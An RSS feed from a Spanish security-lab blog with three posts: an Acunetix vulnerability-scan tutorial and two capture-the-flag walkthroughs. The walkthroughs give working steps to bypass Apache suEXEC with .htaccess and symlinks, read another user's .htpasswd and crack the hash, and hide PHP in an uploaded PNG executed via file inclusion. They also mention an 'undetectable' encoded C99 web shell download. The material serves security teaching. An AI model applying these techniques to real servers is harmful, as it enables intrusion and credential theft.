<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; Vulnerabilidades</title>
	<atom:link href="http://labs.dragonjar.org/tag/vulnerabilidades/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades VII</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-vii</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-vii#comments</comments>
		<pubDate>Mon, 22 Sep 2008 17:46:57 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Acunetix]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=237</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Recordemos antes la definición de escaneo de vulnerabilidades:</strong></p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.” (<a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Continúa…</a>)</p>
<p style="text-align: justify;"><strong>Práctica 57 &#8211; Escaneo de vulnerabilidades Web con Acunetix<br />
<strong>Herramienta:</strong> </strong>Acunetix<strong><br />
<strong>Prerequisitos:</strong> </strong>Ninguno<strong><br />
<strong>Contramedidas: </strong></strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
<strong>Descripción: </strong></strong>Acunetix Web Vulnerability Scanner es un escáner de vulnerabilidades en aplicativos Web (CMS, Sistemas de Información Web, Web dinámicas etc.), permite llevar a cabo de manera automática detecciones de vulnerabilidades del tipo SQL Injection, XSS,  Cifrado, descubrimiento de directorios, etc.</p>
<p style="text-align: justify;"><span id="more-237"></span>Como se ha mencionado anteriormente, las soluciones de escaneo de vulnerbilidades no deben ser tomadas como la verdad absoluta en cuanto a descubrimiento se refiere, estos escanners deben ser usados como complemento a las revisiones manuales del código de la aplicación Web objetivo.</p>
<p style="text-align: justify;">Veamos entonces como llevar a cabo un escaneo simple con Acunetix:</p>
<p style="text-align: justify;">Descargamos la herramienta desde la Web oficial</p>
<p><a href="http://img254.imageshack.us/img254/1185/acunetix1ns1.jpg"><img src="http://img254.imageshack.us/img254/1185/acunetix1ns1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Es posible además descargar una versión libre de Acunetix, pero con la limitante de solo auditar vulnerabilidades del tipo XSS</p>
<p style="text-align: justify;">Una vez descargado, el proceso de instalación no se diferencia a muchos en sistemas windows (siguiente-siguiente)</p>
<p><a href="http://img254.imageshack.us/img254/9558/acunetix2wm4.jpg"><img src="http://img254.imageshack.us/img254/9558/acunetix2wm4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Quiero resaltar una nuevo complemento disponible en la versión 5.1 de Acunetix. Se trata de una extensión para FireFox, que permite ejecutar el escaner desde el propio navegador.</p>
<p><a href="http://img254.imageshack.us/img254/6359/acunetix3ik8.jpg"><img src="http://img254.imageshack.us/img254/6359/acunetix3ik8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una vez instalado procedemos a ejecutar desde los accesos directos creados en la instalación</p>
<p><a href="http://img216.imageshack.us/img216/9020/acunetix4xu0.jpg"><img src="http://img216.imageshack.us/img216/9020/acunetix4xu0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ejecución de Acunetix</p>
<p><a href="http://img184.imageshack.us/img184/9258/acunetix5ui9.jpg"><img src="http://img184.imageshack.us/img184/9258/acunetix5ui9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Wizard de ejecución de Acunetix, para este caso lo haré dirigido a un sistema virtualizado de intrusión</p>
<p><a href="http://img443.imageshack.us/img443/7061/acunetix6jg8.jpg"><img src="http://img443.imageshack.us/img443/7061/acunetix6jg8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">El Wizard no permite hacer un pequeño reconocimiento del sistema objetivo, para este caso ha detectado a Apache 2.x, Fedora, y PHP.</p>
<p><a href="http://img229.imageshack.us/img229/1356/acunetix7vk4.jpg"><img src="http://img229.imageshack.us/img229/1356/acunetix7vk4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Algunas opciones más de escaneo</p>
<p><a href="http://img254.imageshack.us/img254/1150/acunetix8yu1.jpg"><img src="http://img254.imageshack.us/img254/1150/acunetix8yu1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Desde esta pantalla podemos seleccionar el tipo de escaneo (Blind Injection, cgi tester, dir file, sql injection, etc)</p>
<p><a href="http://img529.imageshack.us/img529/7982/acunetix9uy4.jpg"><img src="http://img529.imageshack.us/img529/7982/acunetix9uy4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Damos clic en el botón Finish para iniciar el escaneo</p>
<p><a href="http://img529.imageshack.us/img529/6233/acunetix10bo9.jpg"><img src="http://img529.imageshack.us/img529/6233/acunetix10bo9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Pantalla de ejecución de Acunetix</p>
<p><a href="http://img262.imageshack.us/img262/3196/acunetix11zv7.jpg"><img src="http://img262.imageshack.us/img262/3196/acunetix11zv7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Información sobre algunas vulnerabilidades encontradas (aún en ejecución)</p>
<p>&lt;<a href="http://img508.imageshack.us/img508/2104/acunetix12jc0.jpg"><img src="http://img508.imageshack.us/img508/2104/acunetix12jc0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Detalles del escaneo (finalizado), para este caso 5 de alto riesgo, todas ellas relacionadas a la versión de PHP.</p>
<p><a href="http://img254.imageshack.us/img254/1609/acunetix13bn7.jpg"><img src="http://img254.imageshack.us/img254/1609/acunetix13bn7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Acunetix presenta un editor personalizado de ejecución de las diferentes vulnerabilidades</p>
<p><a href="http://img223.imageshack.us/img223/4222/acunetix14nr0.jpg"><img src="http://img223.imageshack.us/img223/4222/acunetix14nr0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Además tiene varias herramientas de explotación y análisis (escaneo de subdominios, editor http, http snnifer, http fuzzer, test de autenticación &#8211; fuerza bruta-, etc ).</p>
<p><a href="http://img524.imageshack.us/img524/818/acunetix15wp1.jpg"><img src="http://img524.imageshack.us/img524/818/acunetix15wp1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Como mencioné anteriormente el nuevo Acunetix permite la incorporación al navegador FireFox por medio de una extensión, veamos:</p>
<p><a href="http://img395.imageshack.us/img395/7651/acunetix16mp4.jpg"><img src="http://img395.imageshack.us/img395/7651/acunetix16mp4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Resultados del escaneo desde FireFox a un objetivo bajo SQL injection</p>
<p><a href="http://img88.imageshack.us/img88/1167/acunetix17fs9.jpg"><img src="http://img88.imageshack.us/img88/1167/acunetix17fs9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Sobra decir que el objetivo de este laboratorio es simplemente el de llevar a cabo un escaneo automatizado de vulnerabilidades, el tema de explotación de vulnerabilidades será cubierto en próximos laboratorios.</p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de Acunetix<br />
Consultar acerca de como llevar a cabo procesos de hardening de sistemas.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong> Spoofing</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-vii/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (VI de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii#comments</comments>
		<pubDate>Mon, 01 Sep 2008 19:53:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comandos Linux]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=246</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la quinta entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 5 publicado por <a href="http://sg6-labs.blogspot.com/2008/03/secgame-1-sauron-resolucin-nivel-5.html" target="_blank"><strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/61351393/8da74e57/Solucionario_05_HackTaller_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org).</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank"></a><a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">BackTrack</a>,<a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank"></a> <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a> (en nuestro caso, <a href="http://www.hirednetwork.com/?p=138" target="_blank">C99</a>), <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">John The Ripper</a>, <a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank"><br />
</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; .<a href="http://mundogeek.net/archivos/2005/05/04/htaccess/" target="_blank">HTACCESS</a> &#8211; <a href="http://labs.dragonjar.org/comandos-habituales-en-linux" target="_blank">Comandos habituales en Linux</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211;  <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell</a>, <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a>, <a href="http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/" target="_blank">Null Byte Injection</a></p>
<p style="text-align: justify;"><span id="more-246"></span>El nivel 5 es quizá uno de los momentos menos concretos de todos los que se pueden presentar. Ahora hemos conseguido ser usuarios locales del sistema, podemos ejecutar comandos, leer directorios, ver configuraciones, y podemos, en definitiva, explorar muchísimas posibilidades.</p>
<p>Sin embargo, hay que matizar algo importante, que puede servir para ahorrarnos muchas horas de trabajo inútil: si nos encontramos en un sistema actualizado, sin fallos de seguridad en el kernel y en otros servicios administrativos, es muy difícil, a menos que el administrador haya configurado algo de forma errónea, escalar privilegios directamente, hacia un usuario administrativo. ¿Qué podemos hacer entonces en estas situaciones?</p>
<p>Nuestro objetivo, en estos casos en los que ser &#8220;root&#8221; o &#8220;Administrador&#8221; no parece ser inmediato, será extraer la mayor cantidad de información del sistema, obtener el mayor número de cuentas de usuario posibles, etc.</p>
<p><strong>¿Cómo conseguir eso?</strong></p>
<p style="text-align: justify;">Primeramente, en los sistemas que tengan servicios web, nos centraremos en estos, ¿por qué?. Básicamente porque el aislamiento entre usuarios web, es quizá no complicado, pero sí tedioso. Es fácil encontrar escenarios en los que directamente podamos acceder a los directorios de otros usuarios en la web, y leer sus ficheros, porque todas estas carpetas pueden ser leídas por el usuario que ejecuta el servidor web ( apache, httpd, etc ). En otros escenarios los usuarios web estarán aislados usando cgi-wrappers. Y únicamente, en los entornos más avanzados y seguros, cada usuario web poseerá una máquina virtual o un vps, en la que sólo existirá él. En caso de no existir escenario web, otros escenarios posibles son por este orden: ficheros de configuración, ficheros temporales, ficheros de logs y permisos inseguros.</p>
<p>En este escenario que nos ocupa, relativamente común en un entorno de seguridad medio con árbol web (incluso muy común en granjas de servidores web), vamos a ver cómo se puede proceder. Lo primero, saber quiénes son los usuarios.</p>
<p><strong>blindware:x:500:500::/var/www/blindware:/bin/bash<br />
intranet:x:501:501::/var/www/intranet:/bin/bash<br />
developer:x:502:502::/home/developer:/bin/bash</strong></p>
<p>El sistema parece tener 3 usuarios. 2 de ellos, usuarios web, uno de los cuales es el usuario con el que podemos ejecutar comandos, y otro es el usuario “intranet”.</p>
<p>Podemos probar a acceder al directorio del usuario intranet (<strong>/var/www/intranet</strong>), pero rápidamente nos daremos cuenta, que poco podemos hacer, pues nos deniega el acceso. Incluso si intentamos leer <strong>/var/www</strong>, obtendremos resultado parecido, puesto que sus permisos son los siguientes:</p>
<p><strong>d&#8211;x&#8211;x&#8211;x 8 root root 4096 May 12 13:52 www</strong></p>
<p>Ésta situación es bastante común, sin embargo, hay un fichero en el sistema que nos será siempre de gran utilidad, y es la configuración del propio Apache, la cual habitualmente se encuentra desprotegida (en este caso dentro de <strong>/etc/httpd/httpd.conf</strong>).</p>
<p><strong>&lt;VirtualHost *:80&gt;<br />
ServerAdmin blindware@blindware.inc<br />
DocumentRoot /var/www/blindware/htdocs<br />
ServerName www.blindware.inc<br />
SuexecUserGroup blindware blindware<br />
&lt;Directory /&gt;<br />
Options Indexes SymLinksIfOwnerMatch ExecCGI<br />
AllowOverride All<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</strong></p>
<p><strong>&lt;VirtualHost *:80&gt;<br />
ServerAdmin intranet@blindware.inc<br />
DocumentRoot /var/www/intranet/htdocs<br />
ServerName intranet.blindware.inc<br />
SuexecUserGroup intranet intranet<br />
&lt;Directory /&gt;<br />
Options Indexes SymLinksIfOwnerMatch ExecCGI<br />
AllowOverride All<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</strong></p>
<p>De esta configuración, lo primero que extraemos, es que los hosts están aislados mediante Apache suEXEC, lo cual hace que PHP esté configurado para ejecución en modo CGI, en vez de cómo módulo de Apache, y por ello antes necesitábamos permisos de ejecución en los ficheros PHP. Tal y como comentamos con anterioridad, no es recomendable ir reinventando la rueda a cada paso, por ello, la pregunta que nos tenemos que hacer en este punto es: ¿existe algún procedimiento público y documentado que permita sobrepasar los mecanismos de aislamiento de hosts basados en Apache suEXEC?.</p>
<p>Existe, únicamente tenemos que buscar en Google: &#8220;<strong>apache suexec</strong>&#8220;, &#8220;<strong>apache suexec bypass</strong>&#8220;, o similares y encontraremos un documento denominado &#8220;<strong>Apache suEXEC Bypass</strong>&#8221; en el cual se nos detalla de forma bastante extensa los problemas de configuración asociados a éste sistema.</p>
<p>A grandes rasgos, nosotros vamos a sacar lo más interesante del documento, para hacernos una idea de cómo podemos proceder para leer ficheros dentro del directorio web del usuario intranet.</p>
<p><strong>1.</strong> Los diferentes hosts virtuales de Apache, mediante suEXEC, lo que consiguen es que cada host ejecute comandos CGI, bajo un usuario diferente. De esta forma, por ejemplo, nosotros ejecutamos comandos con “blindware”, mientras que el vhost intranet, ejecuta comandos con el usuario “intranet”.</p>
<p><strong>2.</strong> Esto permite un esquema de aislamiento “relativamente” sencillo.</p>
<p><strong>drwxr-x&#8212; 3 blindware apache 4096 nov 25 17:00 blindware<br />
drwxr-x&#8212; 3 intranet apache 4096 nov 25 17:00 intranet</strong></p>
<p>Si nos damos cuenta, cada usuario es propietario de su directorio, y ningún otro usuario puede acceder a ellos, a excepción del usuario apache, con el que se ejecuta el servicio web. Esto &#8220;garantiza&#8221;, que aunque el usuario ejecute comandos en el sistema, ningún usuario podrá acceder al directorio de otro usuario.</p>
<p><strong>3.</strong> Esta idea, cuenta con un fallo: el enlace simbólico. Los enlaces simbólicos se pueden establecer sobre ficheros en los que no tenemos permisos. Dicho de otra forma, nosotros como usuario “blindware”, podemos enlazar cualquier fichero del usuario “intranet”, del que conozcamos su existencia.</p>
<p><strong>4.</strong> Una vez enlazado el fichero, podremos usar Apache, para leer el enlace simbólico, de esta forma, el enlace simbólico será leido con los permisos de Apache, usuario Apache, y podremos acceder a aquellos directorios a los que Apache tenga acceso, que comúnmente son todos los del árbol web, puesto que debe poder leerlos.</p>
<p><strong>5.</strong> Para que el ataque tenga éxito Apache, es así por defecto, debe estar activa la opción <strong>FollowSymLinks</strong> en Apache. Por el contrario, si la opción que se encuentra activa es <strong>SymLinksIfOwnerMatch</strong>, el ataque no se podrá realizar, puesto que Apache, únicamente seguirá enlaces que apunten a ficheros propiedad del dueño del enlace.</p>
<p><strong>6.</strong> En caso de estar activa la directiva <strong>SymLinksIfOwnerMatch</strong>, podrá ser modificada por un usuario mediante un fichero <strong>.htaccess</strong>, siempre que las opciones <strong>AllowOverride Options</strong>, o <strong>AllowOverride All</strong>, estén habilitadas.</p>
<p>A priori, parece que nos encontramos en un escenario vulnerable: se usa <strong>suEXEC</strong>, y aunque se encuentra habilitada la opción <strong>SymLinksIfOwnerMatch</strong>, también está habilitada la cláusula <strong>AllowOverride All</strong>. Por tanto, es cuestión de proceder, a través de nuestra shell en PHP según lo que vamos a describir a continuación. Un detalle importante, cuando queramos ejecutar contenido en nuestra shell PHP, cualquier instrucción que incluya caracteres mínimamente extraños, debemos hace uso de URLEncode.</p>
<p><strong>1.</strong> Lo primero que queremos hacer es escribir un fichero <strong>.htaccess</strong> que nos permita aprovecharnos de esta vulnerabilidad. La orden bien pudiera ser esta.</p>
<p><strong>echo &#8220;Options -SymLinksIfOwnerMatch +FollowSymLinks&#8221; &gt; .htaccess</strong></p>
<p>Pero como sabemos, debe ser URLEncodeada, quedando una cadena, para su ejecución en nuestra shell, como la siguiente:</p>
<p><strong>echo+%22Options+-SymLinksIfOwnerMatch+%2BFollowSymLinks%22+%3E+.htaccess</strong></p>
<p><strong>2. </strong>Ahora es cuestión de crear un enlace simbólico, sobre algún contenido que nos interese leer del directorio “intranet”. En este caso, lo más interesante es leer el fichero .htaccess de ese directorio, del que nos garantizamos su existencia, y que además nos impide el acceso al contenido web de <strong>http://intranet.blindware.inc</strong>.<br />
Creamos pues el enlace simbólico:</p>
<p style="text-align: justify;"><strong>ln –s /var/www/intranet/htdocs/.htaccess htaccess</strong></p>
<p>De esta forma, tenemos un enlace directo, en nuestro directorio <strong>http://www.blindware.inc/_controlp/htacccess</strong>, que una vez visitado nos dará el contenido del fichero:</p>
<p><strong>Options +Indexes<br />
AuthName &#8220;Blindware &#8211; Intranet Protected&#8221;<br />
AuthType Basic<br />
AuthUserFile /var/www/intranet/htdocs/.htpasswd<br />
require valid-user</strong></p>
<p><strong>3.</strong> Repetimos el proceso, una vez que conocemos la localización del fichero .htpasswd. Para ello creamos otro enlace simbólico: <strong></strong></p>
<p style="text-align: justify;"><strong>ln -s /var/www/intranet/htdocs/.htpasswd htpasswd</strong></p>
<p>De esta forma, creamos un enlace directo, en nuestro directorio <strong>http://www.blindware.inc/_controlp/htpasswd</strong>, que una vez visitado nos dará el contenido del fichero.</p>
<p><strong>admin:tCPJIYCZjtqF6</strong></p>
<p><strong>4.</strong> Tenemos el usuario, y el hash del acceso a intranet.blindware.inc, podemos bien intentar crackearlo, bien seguir intentando la lectura de ficheros contenidos en ese directorio. A priori es un hash DES tradicional, con lo cual podemos intentar romperlo, a ver qué sucede.</p>
<p>Para romper el hash, hacemos uso de la herramienta “john the ripper”, que es con diferencia el crackeador de passwords más conocido de Unix.</p>
<p><strong>$ john htpasswd</strong><br />
<strong>guesses: 1 time: 0:00:00:10 (3) c/s: 335628 trying: 132449 &#8211; 132498<br />
Loaded 1 password hash (Traditional DES [64/64 BS MMX])<br />
132456 (admin)</strong></p>
<p>Pues ya conocemos el password: 132456 con usuario admin. Lo que nos permite acceder a intranet.blindware.inc y seguir avanzando en la resolución de Sauron. Dentro de 15 días, continuaremos con el siguiente nivel.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (V de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii#comments</comments>
		<pubDate>Mon, 01 Sep 2008 17:25:04 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=242</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la quinta entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 4 publicado por <a href="http://sg6-labs.blogspot.com/2008/02/secgame-1-sauron-resolucin-nivel-4.html" target="_blank"><strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/61331624/79bc3574/Solucionario_HackTaller_DragonJARorg.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org) &#8211; Incluye la Shell C99 codificada en base 64 &#8220;no detectable&#8221;.</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell Linux</a>/<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> (incluido en <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">backtrack</a>-<a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a>), <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a> (en nuestro caso, <a href="http://www.hirednetwork.com/?p=138" target="_blank">C99</a>)<a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank"><br />
</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"></a> <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211; <a href="http://www.tips.cl/viewtopic.php?p=52&amp;sid=4c922498c6ef26b0056db3390cb08fa8" target="_blank">Comando CAT</a>, <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell</a>, <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a>, <a href="http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/" target="_blank">Null Byte Injection</a></p>
<p style="text-align: justify;"><span id="more-242"></span><strong>Este es el aspecto que presenta el nivel 4. Dividido en 4 secciones:</strong></p>
<ul>
<li>Información sobre el sistema</li>
<li>Administración de MySQL mediante MySQL Admin</li>
<li>Visualización de Estadísticas</li>
<li>Cambio de parámetros</li>
</ul>
<p style="text-align: justify;">Sobre la visualización de estadísticas, poco hay que comentar. Ya nos es familiar porque ya hemos accedido a ella, pero desde otro lugar, durante el nivel 2, por tanto no aporta nada a lo que ya conocemos.</p>
<p>Luego existen 2 partes que contienen aplicaciones públicas, por un lado tenemos phpSysInfo, y por otro phpMyAdmin. En la idea original de este juego está el que no sea necesario el uso de fallos en aplicativos públicos para superarlo, siendo así por un motivo bien sencillo: con el paso del tiempo uno o todos los aplicativos que existen instalados en la máquina virtual serán susceptibles de fallos.</p>
<p>No obstante, podemos evaluar la seguridad de estas versiones, y ver que no parecen existir exploits públicos relevantes para las mismas. Existe un XSS en phpSysInfo, poco relevante para una explotación efectiva, al igual que otro en phpMyAdmin. Comentar como apunte que el hecho de que a fecha de hoy no parezcan existir ataques relevantes no quiere decir, evidentemente, que en un futuro no puedan aparecer, e incluso, y dado que son aplicaciones de código abierto, una vez agotadas el resto de vías, es posible que una revisión exhaustiva de su código fuente, y de su ejecución, pueda revelarnos fallos de seguridad no públicos.</p>
<p>Sin embargo, en el caso que nos ocupa, antes de llegar a la revisión de código público, hay que percatarse de la sección &#8220;Cambio de parámetros&#8221; la cual permite la subida de un fichero al servidor. Ésta *siempre* es una función crítica y debe ser evaluado su riesgo, ya que permitirá al atacante subir algún tipo de contenido a nuestro sistema.</p>
<p>Para el caso que nos ocupa, podemos darnos cuenta que la robustez y codificación de la subida de imágenes es la apropiada:</p>
<ul>
<li>Únicamente permite ficheros con extensión PNG</li>
<li>El tamaño del fichero está limitado a 8KB</li>
<li>El contenido del fichero debe corresponder con una imagen PNG</li>
</ul>
<p style="text-align: justify;">Esto hace que no podamos subir un fichero renombrado como .PNG, sino que debamos subir un gráfico PNG, limitado a 8KB, y con extensión PNG. Por tanto, a priori, podemos pensar que no existe posibilidad alguna de explotar ningún fallo. Bien, veremos que no es así.</p>
<p>Lo primero que debemos plantearnos es: ¿en una imagen PNG únicamente puede existir eso?. La respuesta es que no. Nada más sencillo que concatenar al final de un fichero PNG, código ejecutable en formato PHP. Para ello, a partir de una imagen PNG de menos de 8KB y válida para subirla al servidor, hacemos lo siguiente:</p>
<p><strong>$ cat &gt;&gt; img.png<br />
&lt;? phpinfo(); ?&gt;</strong></p>
<p>Para los no familiarizados con UNIX, decir que simplemente hemos añadido al final del fichero ese código PHP. Una vez hecho esto, tendremos un fichero válido, en formato PNG, que contiene al final del mismo un código PHP. Este fichero podrá ser subido al servidor.</p>
<p>¿Y ahora qué?. Ahora queda percatarse de un par de detalles importantes. El primero, ¿cómo se llama el fichero que contiene la imagen?. En este caso, el fichero de imagen es: <strong>http://www.blindware.inc/_controlp/image.php</strong>, o dicho de otra forma, un fichero PHP se encarga de servir la imagen, de la que aún desconocemos su nombre y ubicación. ¿Cómo podemos saberla?. Pues haciendo uso del error que vimos en el nivel 3 dentro del fichero index.php, que permitía la lectura de ficheros. Con ese error leemos el contenido de image.php:</p>
<p><strong>&lt;? header(&#8220;Content-Type: image/png&#8221;); readfile(&#8220;01.png&#8221;); ?&gt;</strong></p>
<p>Por tanto, nuestro fichero subido sabemos que se llama &#8220;01.png&#8221; y que se encuentra en el mismo directorio de <strong>/_controlp/</strong> que el resto de datos. ¿Cómo podemos explotar el fichero con contenido PHP?. En este caso concreto, es cuando se puede apreciar, como la subida de ficheros maximiza el riesgo de otro de los fallos encontrados en el nivel 3. Si recordamos además de leer ficheros mediante el error localizado en index.php, podemos incluir ficheros para ser procesados por PHP desde un error con idéntica explotación localizado en login.php. Al hacerlo obtenemos como resultado de incluir nuestro fichero 01.png manipulado lo siguiente:</p>
